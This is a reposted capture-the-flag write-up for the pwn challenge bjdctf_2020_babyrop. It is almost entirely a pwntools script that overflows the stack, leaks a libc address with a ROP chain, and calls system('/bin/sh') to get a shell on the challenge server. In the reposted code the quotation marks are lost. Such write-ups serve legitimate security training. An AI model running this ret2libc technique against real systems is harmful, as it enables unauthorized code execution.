bjdctf_2020_babyrop

Posted gaonuoqi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了bjdctf_2020_babyrop相关的知识,希望对你有一定的参考价值。

找不到libc文件  用LibcSearcher模块

from pwn import *
from LibcSearcher import *

context.log_level=debug
r=remote(node3.buuoj.cn,28426)
#r=process(‘./bjdctf_2020_babyrop‘)
elf=ELF(./bjdctf_2020_babyrop)
puts_got=elf.got[puts]
puts_plt=elf.plt[puts]
main_addr=elf.symbols[main]
pop_rdi=0x0000000000400733


payload=a*0x20+b*0x8
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(Pull up your sword and tell me u story!)
r.sendline(payload)
r.recv()

puts_addr=u64(r.recv(6).ljust(8,x00))
libc=LibcSearcher(puts,puts_addr)
libc_base=puts_addr-libc.dump(puts)
system_addr=libc_base+libc.dump(system)
bin_addr=libc_base+libc.dump(str_bin_sh)

payload=a*0x20+b*0x8
payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
r.recvuntil(Pull up your sword and tell me u story!)
r.sendline(payload)

r.interactive()

 

以上是关于bjdctf_2020_babyrop的主要内容,如果未能解决你的问题,请参考以下文章

bjdctf_2020_babyrop2

[BJDCTF2020]EzPHP

bjdctf_2020_babystack2

[BJDCTF2020]ZJCTF,不过如此

2020/5/17 BUU_[BJDCTF2020]easy

2020/5/17 BUU_[BJDCTF2020]easy